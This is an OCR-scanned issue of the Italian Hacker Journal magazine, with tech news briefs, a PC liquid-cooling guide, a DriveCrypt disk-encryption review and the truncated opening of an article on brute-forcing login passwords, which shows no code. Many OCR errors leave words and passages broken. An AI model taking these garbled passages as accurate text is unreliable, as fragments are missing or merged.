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hacker (hak'dr) 

'Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione 

e come espandere le loro capacità, a differenza di molti utenti, 

che preferiscono imparare solamente il minimo necessario." 




La via di Sarkozy 




(ANSA) - LONDRA, 13 FEB - Guai in Gran Bretagna per il download 
di musica e video pirata: chi scarica illegalmente rischia di veder- 
si tagliato l'accesso alla Rete. Il governo Brown ha messo a pun- 
to una drastica proposta di legge per far fronte ad una piaga che 
ha già' messo in ginocchio l'industria discografica e minaccia di 
mandare in crisi anche Hollywood. 



Ci sembrava strano che ancora non fosse 
successo, come è vero che l'erba cattiva non 
muore mai è altrettanto vero che le pessime 
idee sono le prime ad essere copiate e co- 
sì il governo Brown sta mettendo in piedi il 
medesimo sistema applicato in Francia per 
tagliare le connessioni agli utenti del P2P. 
Tutto ciò è sempre più imbarazzante so- 
prattutto all'ombra della resa che sem- 
bra ormai pervadere il fronte anti-P2P, 
chi di noi non ha pensato che gli accor- 
di per la distribuzione gratuita di musi- 
ca on-line non siano una resa verso il 
filesharing??? Allora perché innalza- 
re ulteriormente il livello dello scontro, con 

tutti i problemi che questo com- 
porta in termini di proble- 
mi riguardo la privacy, ingiustizie 
varie e quant'altro??? Tutti questi dubbi 
non sembrano aver neanche sfiorato la mente 
del Department of Media, Culture and Sport 
che ha proposto il Green Paper, documento 
[ nel quale viene appunto menzionata la "dot- 
trina Sarkozy" come esempio da seguire con 
un'ingiunzione a terminare l'illecito recapitata 
via mail e la sospensione del servizio di for- 
"" nitura di banda per i recidivi e la cancella- 
zione del contratto con il provider per quel- 
li all'ultimo stadio. 

L'unica cosa che ci sentiamo di dire è 
che se proprio dovete copiare almeno fa- 
telo da quelli che vanno bene a scuola e 
- non dal peggiore della classe... 
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HACKER JOURNAL: INTASATE LE NOSTRE 



Diteci cosa ne pensate di HJ, siamo tutti raggiungibili via e-mail, tramite lettera o messo 

a cavallo... Vogliamo sapere se siete contenti, critici, incazzati o qualunque altra cosa! 

Appena possiamo rispondiamo a tutti, scrivete! 

redazione@hackerjournal.it 
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Hi pio di dimani t li 

"Potete giudicare quanto intelligente è un uomo dalle sue risposte. Potete giudicare quanto è saggio dalle sue domande." 

Naguib Mahfuz 



J er quanto continuiamo a sen- 
I tirci in imbarazzo con il resto 



■ d'Europa per lo stato delle 
| || nostre connessioni dobbia- 
mo ammettere che le offerte per 
l'ADSL si stanno moltiplicando e 
nel marasma che ne esce alcune 
riescono ad essere sensate e con- 
venienti: per esempio la versione 30 
di Tutto Compreso per abbonati Tim 
è effettivamente buona: con 30 euro 
al mese si hanno bonus 250 minuti di 
telefonate, 100 messaggi Sms, 1 GB 
di traffico Wap, 10 ore di traffico Inter- 
net e altri bundle che comprendono 
anche 5 MB di traffico di posta e In- 
ternet verso server di BlackBerry. Co- 
me al solito bisogna interpretare bene 
l'offerta ma alla fine uno si dice: ok, 
tengo sotto controllo i miei consumi e 
quando mi avvicino alla soglia non mi 
collego più e aspetto il mese succes- 
sivo. Il punto focale è proprio questo: 




come tengo costantemente sotto con- 
trollo il mio consumo??? 
Gli strumenti per verificare il traffi- 
co ci sarebbero: il 4915 ia telefono, il 
119 da Wap e il www.119.it dalla re- 
te. Il problema è che sono tutti basa- 
ti, per stessa ammissione di Tim, su 
un sistema vecchio e pensato solo per 
il traffico vocale e questo equivale ad 
avere tempi di aggiornamento del pro- 
prio stato che, in epoca digitale, corri- 
spondono a ere geologiche. Il ritardo 
medio di aggiornamento del 4915 è di 
cinque giorni. Abbiamo provato ed è 
risultato che il 10 febbraio i dati era- 
no fermi al 30 gennaio... Come se non 
bastasse Tim avverte espressamente 
che, anche quando sono aggiornati, i 
dati possono essere indicativi. Molto 
indicativi. A fine febbraio risultava che 
avevamo consumato un singolo KB 
del 1.024 disponibili per la connes- 
sione Wap, quando in realtà l'aveva- 
mo usata abbondantemente per tutto 
il mese. Risultava anche la disponibili- 
tà di tutte le ore di traffico 
Internet, quando c'erava- 
mo connessi per almeno 
due ore. Il nostro traffico 



è sfuggito ai controlli e quindi siamo 
al sicuro? Per niente. Tim farà i con- 
trolli giusti soltanto per la fatturazione 
e solo sulla bolletta sapremo se avre- 
mo sforato le soglie. E lo sapremo pa- 
gando caro. Il 4916, il numero dedi- 
cato alle informazioni sul traffico del- 
le prepagate, funziona meglio e i dati 
sono aggiornati quasi in tempo reale. 
A questo punto viene spontaneo chie- 
dersi: Possibile che Tim non riesca a 
fare lo stesso sul 4915? Non vorrem- 
mo sembrare dei malfidenti ma non 
potrebbe essere che a Tim conviene 
tenere i suoi clienti all'oscuro sull'ef- 
fettivo traffico generato fino al salas- 
so finale? Inoltre riflettevamo: sulle ri- 
caricabili quando finisce il credito non 
si può più telefonare ma si possono 
ancora fare connessioni dati e anda- 
re in negativo. Il nostro saldo lo sco- 
priremo facendo una ricarca e trovan- 
doci ancora a credito zero perché non 
abbiamo colmato il buco. Un operato- 
re di Tim ci ha detto che chi incorre 
in questo problema viene graziato la 
prima volta: il saldo viene rimesso a 
zero. Ma solo la prima volta. Vi sem- 
bra corretto??? ■ 



TELECOM 



ITALIA 
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INTERCETTAZIONI 

UBERE 



Grandi e giuste polemiche sta 
facendo sorgere negli Stati 
Uniti una proposta di legge facen- 
te parte del famigerato Protect 
America Act. Si tratta di una voce 
che permetterebbe di scagionare 
tutte le compagnie telefoniche che 
fino ad oggi hanno effettuato inter- 
cettazioni telefoniche illegali, cioè 
senza l'autorizzazione di un giudi- 
ce. La legge di per sé non dice que- 
sto in maniera esplicita ma amplia, 
per questioni di lotta la terrorismo, 
le maglie della legge sulle intercet- 
tazioni telefoniche e oltretutto con 
effetto retroattivo cancellando di 
fatto tutte le cause in corso contro 
At&T e altri operatori. Il grande fra- 
tello è sempre più vicino!!! 











'apita che personaggi siano messi alla gogna at- 
traverso le pagine web della rete globale e la co- 
sa non è certamente carina, chiunque sia il sogget- 
to, soprattutto se la base delle accuse e calunio- 
sa e falsa. Per fortuna qualcuno a pensato bene di 
mettere in piedi un sistema di "ripulitura" dell'im- 
magine virtuale. Per ora si parla di 3 aziende, due 
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una americana, che si sono 
specializzate nel reindiriz- 



zare le ricerche effettuate 
sul nome di qualsiasi per- 
sonaggio verso siti "ami- 
ci" dove si parla bene di 
lui allontanando l'atten- 
zione dai siti dove invece 
ci si scaglia contro esso. Il lo- 
ro nome e reputation cleaners e, visto anche 
il livello dei clienti, siamo certi che siano bra- 
vissimi e altrettanto cari. I 



\ 



SULLA BAIA 



Ebbene si, il pericolo è stato 
tanto ma i danni, per fortuna, 
pochi. Nella sede del data center di 
PRQ, hosting svedese gestinto da 
TiAMO e Anakata, due dei padri 
fondatori di The Pirate Bay, si è 
sviluppato un incendio dovuto 
ad un corto circuito elettrico. Le 
fiamme hanno reso inaccessibili 
per alcune ore servizi come Waf- 
fles, Suprnova, Swebits e EZTV. 



Per fortuna nulla è successo al moto- 
re di ricerca e al tracker del- 
la Baia che, come ormai 
tutti sanno, sosta 
su server scono- 
sciuti in giro per 
il mondo proprio 
da quando la poli- 
zia pose sotto seque- 
stro i server pres- 
so PRQ. 




Che Apple sia interessata al mer- 
cato dei videogiochi è 
ormai assodato 
e il fatto che 
la casa di 
Cupertino 
abbia ap- 
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Adirla così fa abbastanza impres- 
sione, secondo uno studio effet- 
tuato da Google 1 sito ogni 1.000 sa- 
rebbe portatore di exploit. Da sem- 
pre la principale fonte di preoccupazio- 
ne per l'utenza standard è stata la mail 
e i malware provenienti da questa o da 
attacchi diretti infatti le soluzioni per 
ovviare questo tipo di rischi sono or- 
mai molti mentre sembrano essere ri- 
maste sguarnite le difese contro il co- 
dice maligno che arriva dalla rete tra- 
mite la navigazione. 

Òóóglé 



La guerra ormai era aperta da tem- 
po e per molti, i più anziani, ha ri- 
cordato molto la disfida sui formati del- 
le videocassette; all'epoca Sony con il 
suo Betamax dovette inchinarsi alla vitto- 
ria del fronte del VHS, questa volta inve- 
ce si è presa una bel- 
la rivincita e, sebbe- 
ne Toshiba non abbia 
ancora rilasciato di- 
chiarazioni in merito 
sembra proprio che 
si sia arresa. In que- 
sto modo il fronte del 
Blu-Ray, capitanato proprio da Sony, ha 
sbaragliato la concorrenza imponendosi, 
anche se il condizionale è ancora d'obbli- 
go, come formato principe per i dischi ot- 
tici ad alta densità. 




on si tratta della solita tira- 
ta di qualche casa di pro- 
duzione di materiale per adul- 
ti contro il diffondersi del suo 
materiale piratato in rete ben- 
sì di una tirate di orecchie da- 
ta da Steven Hirsch, cofounder 
della Vivid Entertainment, una 
delle più importanti realtà del mer- 
cato della pornografia, a Google, 
Yahoo e soci per il loro totale di- 
sinteresse nella protezione dei mi- 
nori dalla visione di materiale por- 
nografico. Verrebbe da dire che 
vorrebbero evitare che i minori lo 
trovassero on-line così da dover- 
lo comprare ma c'è da dire che la 
Vivid è da tempo impegnata seria- 
mente su questo fronte ed è bel- 
lo vedere qualcuno così addentro 
che si occupa del problema. 




pena modificato le caratteristiche del 
marcio Apple aggiungendo anche le 
console per videogames nei suoi pro- 
dotti la dice lunga sulle intenzio- 
ni di Steve Jobs e gio- 
chi. Insomma sem- 
bra che ci si debba 
aspettare un altro 
competitore nella 
lotta per la supre- 
mazia di un settore 
che vale 25-30 mi- 
liardi di dollari al- 
l'anno. 




Liaift M fluiate 



ono ber 
ranno la , 
Foundation, le aziende che rientrano in questo movimer 

to sono: Aplix, LG Electronics, Motorol 

NEC, Panasonic, Purple Labs e Sams 
Tale piattaforma è già presente sul me. 
to nei cellulari Motorola Rokr Z6, Rockr 
E8 e RAZR2 V8 e adesso sembra de- 
stinata ad allargare il bacino dei suoi 
utenti. Bene per il pinguino!!! 
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BALCKBERRY 

TILT 



Per la seconda volta in un an- 
no lo smartphone più diffuso 
negli states e tra i giovani yup- 
pies ha lasciato a piedi i suoi 
utenti smettendo di funzionare 
per tre ore. Il blocco ha riguarda- 
to gli accessi web e mail e ha mes- 
so in crisi circa otto milioni di uten- 
ti negli Stati Uniti. Una nota dei re- 
sponsabili del servizio ha parlato di 
servizi intermittenti e ritardi pur con- 
fermando che nessun messaggio 
o dato è andato perso anche se ci 
sono voluti circa 6 giorni per smal- 
tire tutto il traffico rimasto in sospe- 
so durante il black out. 



>spe- gif 



VIA I COMMENTI NEGATIVI E LA RETE INSORGE 



Bay ha fatto una scelta drastica e per alcuni delirante, togliere i com- 
menti negativi dal profilo dei suo utenti, nella fattispecie si parla dei 
feedback negativi nei confronti dei compratori che si sono comportati in 
maniera scorretta. La cosa ha scatenato un putiferio di proteste tra chi in 
eBay vende e deve ogni giorno lottare contro un'orda di truffatori o aspiranti 

tali e perde in questo modo un 

sistema di valutazione dell'ac- 
quirente. Secondo il sito di aste 
invece in questo modo verreb- 
bero eliminate delle informa- 
_ « *^« i»b zioni inutili risultati soltanto 

^^ m I lJ Wt ^k delle semplici ripicche dei ven- 
ditori in seguito a precedenti 
segnalazioni per merci di cat- 
tiva qualità. 




PRRGETTA 1A NUOVA 



i piacciono i videogiochi 
sei un ottimo programma- 
tore??? Allora forse è arriva- 
ta l'occasione della tua vita!!! 
Su un sito di ricerca del persona- 
le (Games on Deck) è difatti apparso un 
annuncio per ricercare i nuovi svilippatori d. 

Sembra infatti che Nintendo e Micro- 
soft stiano già lavorando sulle pros- 
sime consolle e per Redmond si 
i parla di una presentazione pri- 
ma della fine del 2010. 



ANDROID GIÀ IN PERICOLO 

Ancora non è praticamente nata e già 
fa discutere Android la piattaforma 
mobile di Google. Secondo alcuni esperti 
di sicurezza il fatto di avere una piattafor- 
ma così aperta la rende anche aperta alla 
possibilità di intrusioni con poca possibi- 
lità di controllo da parte dell'utente. Stes- 
so problema si sta per verificare con la 
piattaforma Apple per iPhone che entro 
breve dovrebbe essere resa più "libera" e 
quindi anche più pericolosa. 



Google è stata denunciata da tale 
Jonathan Cobb che nel 2006, ven- 
ne assunto da Google come lavorato- 
re a contratto per conto dell'agenzia 
interinale WorkforceLogic. Parteci- 
pando a un gruppo privato di discus- 
sione su Google Groups con gli altri 
colleghi presentò un nuovo, innovativo 
e potente sistema che poi, da lì a poco, 
sarebbe diventato Google Sky. Ades- 
so l'ex impiegato chiede 25 milioni di 



dollari... di che stare a guardare le stel- 
le per il resto della vita 
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Evoluzione televisiva del social 
networking in arrivo da San Franci- 
sco. Voi mandate da 2 a 10 minuti di qua- 
lisiasi tipo di programma (compresi gli 
spot pubblicitari) e se sono buoni loro li 
trasmettono e ve li pagano pure fra i 200 
e i 1 .000 dollari. Si tratta di Current Tv che 
entro qualche mese sbarcherà anche in 
Italia all'interno del pacchetto Sky. 



MÌ NEWS 





LIHIil.ìliJ OI FAGEBOOK 



Sono sempre 
più le pro- 



di 



r4 



teste da par- 
te degli utenti 
per la difficol- 
tà esistente per 

cancellarsi dal famoso sito di social 
networking. Addirittura sembra esse- 
re impossibile cancellare definitiva- 
mente i propri dati dai meandri del si- 
to. I continui rimandi da un profilo al- 
l'altro tra tutti i contatti rende la cosa 
effettivamente difficili e "le scorie" de- 
gli utenti cancellati continuano a per- 
manere nel sistema 



facebook 
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I celebre sistema di pro- 
tezione informatica ha an- 
nunciato di aver modifica- 
to il proprio scanner antivi- 
rus on-line. Le modifiche ri- 
guardano l'interfaccia e la do- 
tazione di un antispyware. Il 
suo utilizzo rimane comunque 
gratuito e incorpora i motori 
di BitDefender antivirus 2008. 
Lo scanner funziona sotto Xp 
e Vista ma solo con Internet 
Explorer. 



bitddènder 

[secare your every bit 



K P2P PEOTM0 



Altri 12 arresti tra utenti della rete Direct Gonne et per 
jljL accusati per la condivisione di ma- passarsi il materiale e 
teriale pedopornografico. Questi perso- condividerlo con i "compagni 
naggi, per cui non sprecheremo aggetti- di merende". Non possiamo dire al- 
vi, utilizzavano il sistema difilesharing tro oltre al fatto che siamo disgustai 




YAHOO FQR SUE 



Continuano a rincorrersi le voci 
sulla vendita di Yahoo ora a que- 
sto ora a quello. Della partita per ora 
sono soprattutto Microsoft, pietra del- 
lo scandalo del fatto, e AOL. 




La grande compagnia 
americana, proprieta- 
ria tra l'altro di War- 
ner (compresi cine- 
ma, cavi, tv e musi- 
ca). L'intervento di AOL è 
stato auspicato dalla stessa Yahoo 
che vorrebbe evitare di en- 
trare nella sfera di Microsoft 
e spera quindi di convince- 
re AOL a implementare 
la propria pre- 
senza sul web 
anche se voc 





nsistenti par- 
lano della volon- 
tà del gruppo di dismettere 

le attività già esistenti nel 

settore. 
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motivi che ci possono spin- 
gere a installare un sistema 
di raffreddamento a liquido 
sul nostro computer posso- 
no essere diversi: semplice temera- 
rietà, voglia di provare qualcosa di 
nuovo, oppure il legittimo desiderio 
di mantenerlo stabile, e in piena si- 
curezza, anche alzando le frequen- 
ze di lavoro del processore oltre i li- 
miti previsti. 





< 






:: Due miti da sfatare 



Innanzitutto, installare un sistema 
di raffreddamento a liquido non è 
tanto difficile quanto può sembra- 
re. Certo, la prima volta può 
capitare di trovarsi in imba- 
razzo di fronte a tutti gli ag- 
geggi forniti nella confezione, 
ma è sufficiente montare un 
singolo sistema per superare 
ogni paura. 
In secondo luogo, non è 



/ 



O Di solito il martello non fa parte 
della dotazione di strumenti per lavorare su 
un PC, ma stavolta potrebbe tornarci utile, 
così come diversi altri attrezzi da 
meccanico ed elettricista. 



sempre vero che i sistemi di raffredda- 
mento a liquido siano più silenziosi 
delle classiche ventole: può capitare 
che il ronzio della pompa sia molto 
fastidioso e, in ogni caso, anche il ra- 
diatore per funzionare ha bisogno di 
almeno una ventola. Fortunatamen- 
te, però, di solito si tratta di model- 
li di grandi dimensioni e dalla veloci- 
tà di rotazione ridotta, assolutamente 
incapaci di nuocere ai timpani. Ricor- 
diamoci, infine, che anche un siste- 
ma a liquido ha bisogno di manuten- 
zione. Il nemico numero uno, in que- 
sto caso, è la polvere: incastrandosi 
nei cuscinetti, li consuma e questo 
logoramento può provocare qualche 
rumore fastidioso. Di tanto in tanto, 
dunque, dobbiamo ispezionare e pu- 
lire l'impianto. 



p 8 www.hackerjournal.it 




OCLoba-é 



O Nei negozi o su Internet troviamo sistemi 
di raffreddamento economici e tutto in uno, 
ma possiamo anche comprare pompa, 
radiatore e waterbiock separatamente. 



.: l punti caldi 

Per ottenere il miglior risultato, dob- 
biamo individuare i componenti che 
vogliamo raffreddare usando il si- 
stema a liquido. I punti critici, alme- 
no per quanto riguarda la stabilità del 
computer, sono il processore centra- 
le, quello della scheda video e il nor- 
thbridge montato sulla scheda madre. 
Questi tre componenti hanno bisogno 
di essere raffreddati costantemente e, 
non a caso, sono quelli sui quali tro- 
viamo regolarmente i dissipatori. Noi 
dovremo eliminarli tutti, sostituendoli 
con dei waterbiock. Il waterbiock è una 
piastra a tenuta stagna con due ugel- 
li, al cui interno circola il liquido di raf- 
freddamento. Quest'ultimo entra nel- 
la piastra a bassa temperatura, pas- 
sa attraverso una serpentina e scam- 
bia calore con la superficie rovente del 




O Se vogliamo spremere al massimo la 
potenza del nostro processore con 
l'overclock o vogliamo semplicemente dare 
un tocco di originalità al nostro computer, 
l'installazione del raffreddamento a liquido 
è la soluzione ideale. 



2 POSSIBILI ALTERNATIVE 



Ci sono diversi modi per installare un sistema di raffreddamento a liquido. Si può de- 
cidere di raffreddare un solo componente, due o anche tre, l'importante è non affrontare 
il montaggio a caso, ma solo dopo aver tracciato almeno uno schema di ciò che intendiamo 
fare. È importante, poi, avere sempre sotto mano le istruzioni di montaggio. 



waterbiock 
scheda video 
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centrale 
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splitter 



splitter 
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waterbiock 

chipset 

scheda madre 



sistema di raffreddamento del liquido (radiatore + pompa) 



4 



La prima soluzione punta a ottenere la massima efficienza e si basa su una premes- 
sa: i processori attuali scaldano molto meno che in passato. Montando per primo il 
waterbiock del processore centrale, il liquido che ne fuoriesce sarà ancora abbastan- 
za fresco. Possiamo quindi sdoppiare il flusso in uscita e usarlo per raffreddare sia 
il processore grafico, sia quello della scheda madre. 



waterbiock 
scheda video 



waterbiock 

chipset 

scheda madre 



waterbiock 

processore 

centrale 





sistema di raffreddamento del liquido (radiatore + pompa) 



La soluzione più semplice, ma anche meno efficiente, prevede che i tre waterbiock 
siano montati in sequenza. Se il processore centrale e quello grafico scaldano molto, 
però, il liquido in uscita dal secondo waterbiock potrebbe non essere più sufficien- 
temente fresco per raffreddare anche il northbridge della scheda madre. In ogni ca- 
so, sulla confezione di ogni sistema di raffreddamento a liquido è scritto chiaramen- 
te quanti e quali componenti del computer può supportare. 
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FAI DA TE 



VETRINA 



Anche per le schede video 
Se il nostro processore centra- 
le non scalda più di tanto ma abbia- 
mo due schede video particolarmen- 
te "esuberanti", Cooler Master ci per- 
mette di raffreddarle a liquido con 
estrema semplicità: basta rimuovere 
il loro dissipatore standard e montare 
il sistema <ct:Bold>AquaGate Duo Vi- 
va, composto da una centralina e due 
waterblock già dotati di tubi. 



processore: in questo modo ne diminui- 
sce la temperatura con un'efficacia su- 
periore a quella di una normale corren- 
te d'aria. Il liquido, una volta riscaldato, 
esce dal waterblock e prosegue nel cir- 
cuito, raggiungendo il radiatore: qui la 
sua temperatura sarà riportata ai livelli 
iniziali, e il ciclo può ricominciare. 
Il flusso continuo di liquido attraverso il 
waterblock consente di mantenere ab- 
bastanza freschi tutti i componenti raf- 
freddati e, nel contempo, di mantenere 
bassa anche la temperatura del liquido 
stesso. Si può usare un sistema di raf- 
freddamento di questo tipo per il solo 



processore, per la sola scheda video, 
oppure per tutti i componenti sensibili 
del computer, compreso il chipset del- 
la scheda madre. 



:: Il percorso corretto 



Perchè il liquido fluisca bene, la lun- 
ghezza dei tubi deve essere la mino- 
re possibile e non devono esserci 
torsioni o impedimenti che blocchi- 
no o rallentino il flusso. La tempera- 
tura del liquido, inoltre, sale mentre si 
allontana dal radiatore e passa attraver- 
so i waterblock che compongono il cir- 
cuito. Come regola generale, quindi, è 
consigliabile fare in modo che il circuito 
"incontri" per primi i componenti più cal- 
di. La sequenza più logica è quella che 
parte dal radiatore, passa per il proces- 
sore centrale, poi per il processore gra- 
fico e infine per il northbridge. È possi- 
bile, però, che le caratteristiche del ca- 
se o la configurazione della macchina 
suggeriscano scelte differenti. 
Se il PC monta un processore centrale 
e una scheda grafica che se 
aldano molto, per esempio, può esse- 
re una buona idea disporre di uno split- 
ter, ovvero di uno sdoppiatore a "Y", 
che permetta di raggiungere entram- 
bi quando il liquido è ancora fresco e 



ha una maggiore capacità di dissipa- 
zione. Un secondo sdoppiatore, posto 
dalla parte opposta, si occuperà poi di 
immettere nuovamente i due flussi nel 
radiatore. 



:: La scelta giusta 



Non è detto che sia sempre neces- 
sario raffreddare tutti i componen- 
ti. Nella valutazione dobbiamo consi- 
derare anche le difficoltà legate all'in- 
stallazione. Sostituire il dissipatore del 
processore centrale con un waterblock, 
infatti, è piuttosto agevole. Smontare il 
dissipatore di una scheda video, inve- 
ce, richiede qualche attenzione in più. 
Nel caso volessio aggiornare il compu- 
ter sostituendo la scheda video con un 
modello più potente, inoltre, ci trove- 
remmo a dover modificare di nuovo il 
sistema di raffreddamento. 



:: Manutenzione 

Di norma, un sistema di raffredda- 
mento a liquido non ha bisogno di 
grande manutenzione. Tuttavia, ogni 
sei mesi è buona regola controllare 
il livello del liquido ed eventualmente 
rabboccarlo: è infatti normale che una 



PRIMA fi COMINCIARE 



PREPARIAMO I COMPONENTI 

Leggiamo attentamente le istruzioni del si- 
stema di raffreddamento. Prepariamo il wa- 
terblock montando la piastra corretta per il 
nostro processore, AMD o Intel. Calcoliamo 
la lunghezza dei tubi e tagliamoli. 



ESTERNO INTERNO 

Alcuni radiatori possono essere montati 
esternamente o internamente. La prima so- 
luzione è più semplice, la seconda più elegan- 
te. In questo caso, però, potrebbe essere ne- 
cessario eliminare le sporgenze dal case. 



VIA LE GUIDE! 

Le guide dei lettori CD-ROM bloccano il ra- 
diatore. Non ci resta che eliminarle dappri- 
ma con una pinza, poi con qualche martel- 
lata. Sarà ancora possibile montare i CD, ma 
facendo molta attenzione. 
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piccola percentuale evapori e, se si for- 
mano bolle d'aria nel circuito, l'efficien- 
za del sistema si riduce. Possiamo ren- 
dere i controlli più pratici scegliendo un 
sistema di raffreddamento che abbia il 
livello del liquido a vista. 



:: Completiamo il circuito 



Alcuni impianti di raffreddamento 
comprendono anche un sistema di 
controllo che sfrutta un sensore: in 
caso di malfunzionamento spegne 
il computer. Fissiamo il sensore come 
spiegato nelle istruzioni. 




Se con l'impianto di raffreddamento è 
fornito anche un controller, fissiamolo 
come indicato nel manuale d'uso. 
Generalmente, integra una derivazio- 
ne per i pin che controllano l'accensio- 
ne del computer. 




Una volta riempita la vaschetta di li- 
quido refrigerante, possiamo fissare la 
centralina al case stringendo le viti con 
molta forza. Ciò ridurrà vibrazioni e ru- 
more. Avvitiamo anche il waterblock al 
processore. 



L'opera è completa. Nella foto manca- 
no ancora 'alimentatore, i dischi e le al- 
tre periferiche, che avrebbero intralcia- 
to il nostro lavoro. Ora, però, possiamo 
finire di costruire il computer. ■ 



IL PROGETTO 




COLLEGHIAMO LA CENTRALINA 

Seguiamo la stessa procedura usata con 
il waterblock per collegare l'altro ca- 
po dei tubi alla centralina. Questa com- 
prende la pompa, il radiatore e il display 
di controllo. 




INSERIAMOLA NEL CASE 

Tutto il lavoro fatto in precedenza per 
eliminare gli ostacoli nella colonna dei 
dischi ottici è servita: ora la centralina 
scorre tranquillamente nel case. Non fis- 
siamola ancora con leviti. 



FISSIAMO IL WATERBLOCK 

Fissiamo i tubi al waterblock, assicurando- 
ci di stringere con forza gli appositi morset- 
ti. Il liquido refrigerante è non è corrosivo, 
ma una perdita nel circuito rappresentereb- 
be comunque un problema. 





A 



O // sistema Asetek VapoChill si tratta 
di un impianto dotato di compressore; 
sfruttando la compressione del vapore, 
permette di raffreddare il processore 
centrale con un grado di efficienza maggiore 




LA SCHEDA MADRE 

La scheda madre va preparata. A secon- 
da del waterblock impiegato, potreb- 
be essere necessario rimuovere il siste- 
ma di fissaggio per il dissipatore e usare 
quello specifico per il waterblock. 

USIAMO LA PASTA 

L'impiego del raffreddamento a liquido 
non esclude l'uso della pasta termocon- 
duttiva. Mettiamone una goccia al centro 
del processore e non di più. A quel punto, 
possiamo montare il waterblock. 
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Qroteggere i documenti più 
importanti con un sistema di 



codifica è il metodo migliore 
per difenderci dalle incursio- 
ni di curiosi e pirati informatici. 



siamo scegliere ai proteggere i ini< 
sistema operativo usando un prograi 
ma come Drive Crypt Plus Pack, un v 
ro "mostro" che offre la massima sici 
rezza e una impressionante dotazione 
di funzioni specializzate. 



:: Windows nascosto 

Il sistema usato da Drive Crypt Plus 
Pack per proteggere il disco princi- 
pale del computer, quello su cui ab- 
biamo installato il sistema operativo 
e tutti nostri programmi, è basata su 
algoritmo AES a 256 bit, usato anche 
nelle applicazioni militari. 



mbi in alcun modo. La decodifi- 
ca dei dati, infatti, avviene i modo "tra- 
sparente" e il funzionamento del com- 
puter appare assolutamente normale. 
La funzione permette inoltre di 




installare un doppio sistema operativo 

"'hdows 2000 o XP. La configurazione 
programma prevede un sistema di 
esso con due diverse password: una 
ia il sistema operativo "finto", l'altra 
'a invece il sistema nascosto. Si trat- 
i una trovata utile per trarci dagli im- 
d se per qualsiasi motivo dovessimo 

essere costretti a rivelare la password di 

avvio del nostro computer. 



:: Non con Vista 



La procedura per creare un doppio 
sistema operativo è decisamente più 
"impegnativa" della semplice critto- 
grafia del disco e richiede la cancel- 
lazione di tutti i dati dal nostro PC. 



me, di dimensiona minima di 5 GB, 
ospiterà il "finto" sistema operati- 
vo. La partizione, per consentire l'in- 
stallazione del secondo sistema, do- 
vrà avere il file system FAT32, compa- 
tibile con Windows XP ma non con Win- 
dows Vista. La seconda partizione, in- 
vece, può essere creata usando il più 
recente NTFS. 

Durante l'installazione di Drive Crypt 
Plus Pack, dobbiamo impostare il pro- 
gramma in modo che crei un menu di 



REGISTRAZIONE 
BLINDATA 



a una società specializzata in 
software per la sicurezza, c'è 
da aspettarsi una particolare cu- 
ra anche nella gestione delle licen- 
ze d'uso del programma. L'installa- 
zione e la registrazione di Drive Crypt 
Plus Pack richiede due passaggi e "le- 
ga" il codice al computer su cui l'ab- 
biamo installato. 




avvio che sostituisce quello di Win- 
dows. Una volta crittografato il sistema 
operativo, possiamo avviare la creazio- 
ne del sistema nascosto. Non è neces- 
sario, però, installare nuovamente Win- 
dows: Drive Crypt crea infatti un esat- 
to duplicato del sistema che abbiamo 
già. Le due partizioni sono crittografa- 
te usando due chiavi di codifica diver- 
se e il programma avvia quella giusta 
a seconda della password che inseria- 
mo nel menu di avvio. 



:: Chiavi invisibili 

Anche se abbiamo la certezza che 
nessuno metterà mai le mani sul no- 




© Drive Crypt Plus 
Pack è il primo 
programma in 
grado di protegge- 
re con un sistema 
crittografico il 
sistema operativo 
del nostro 
computer. 



stro computer senza la nostra auto- 
rizzazione, è comunque consiglia- 
bile proteggere le chiavi di codifi- 
ca. 



di una procedura che consnete di na- 
scondere la chiave di codifica all'inter- 
no di un'immagine Bitmap a 24 bit o di 
un file audio in formato WAV. Il file con- 
tenitore manterrà tutte le sue funzionali- 
tà e i dati nascosti saranno invece usati 
dal programma percrittografare il disco 
fisso del nostro PC. 
Le chiavi create sono visualizzate all'in- 
terno della sezione Keys del program- 
ma e possono essere usate per codifi- 
care uno o più dischi colegati al nostro 
computer. 



:: Avvio su misura 

Per crittografare il disco principale 
del PC, è necessario per prima co- 
sa installare Bootauth, un sistema 
di autenticazione che si attiva all'av- 
vio del computer. 



otetta tramite 



una password, oppure tramite luso di 
una particolare chiave USB. Anche in 
questo caso, gli sviluppatori Securstar 
hanno previsto una serie di accorgi- 
menti che rendono ancora più efficace 
il sistema di protezione. Bootauth, infat- 
ti, può essere visualizzato in tre diver- 
se modalità. Quella normale prevede 
un menu che indica chiaramente la pre- 
senza di un programma di protezione. 
Le altre due, invece, ne mascherano 
l'esistenza presentando, a nostra scel- 
ta, una normale schermata DOS o un 
" >o messaggio di errore Disk failure. 
che gli ultimi due, ovviamente, con- 
dono l'acesso usando la password o 
chiave USB. Un eventuale ladro o un 
curioso che ha acceso il nostro PC, pe 
rò, sarà portato a credere che il compu 
ter sia guasto. 



:: In caso di emergenza 



L'installazione di un sistema di crit- 
tografia che agisce "a monte" del 
sistema operativo comporta la mo- 
difica del settore di Boot del disco 
fisso. 



PRO £ 
tìONTRO 



PRO 

Crittografia sicura 
Tante funzioni originali 
Tecnologia all'avanguardia 

CONTRO 

Alcune funzioni non disponibili con 
Vista 



danneggiato, quindi, ci troveremmo 
l'impossibilità di accedere al siste 
Per far fronte a una simile sfortur 
evenienza, Drive Crypt mette a no 
disposizione una procedura per ere 
~ Disco di emergenza, ovvero un 

ci consente di avviare il PC e a< 
e al sistema operativo anche se 

è danneggiato. La procedura è 
scritta minuziosamente nel manua 
istruzioni, che è bene consultare in i 
caso prima di installare il programrr 





O // "cuore" del sistema di crittografia è la 
chiave che consente la decodifica dei dati. 
Il programma ci permette di "nasconderla" 
all'interno di un'immagine bitmap a 24 bit o 
in un file audio in formato WA V. 



:: In definitiva 



Un programma potente e realiz- 
zato con grande cura, che mette 
a nostra disposizione tutto quello 
che possiamo desiderare per pro- 
teggere il nostro PC.B 
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HACKING 



La fona bruta 



7 



Una delle più "antiche" ma amora utilizzatissime fame di 
haeking utilizzate per scardinare un sistema een password 



ualcuno si starà chiedendo Brute Forcing, attacca ripetutamen- 



I di cosa stiamo parlando, fac- 
Jciamo subito chiarezza: un 
^ ^ Brute Forcer è un'applicazio- 
ne che, basandosi sulla tecnica del 



te, ad esempio, un form di login secondo 
combinazioni di lettere o parole, in base 
alle richieste dell'utente. Quello che vi 
propongo in questo articolo è un Brute 



Forcer molto elementare, realizzato in C, 
senza l'ausilio di funzioni particolari, più 
avanti eventualmente proporrò una ver- 
sione più "professionale" del program- 
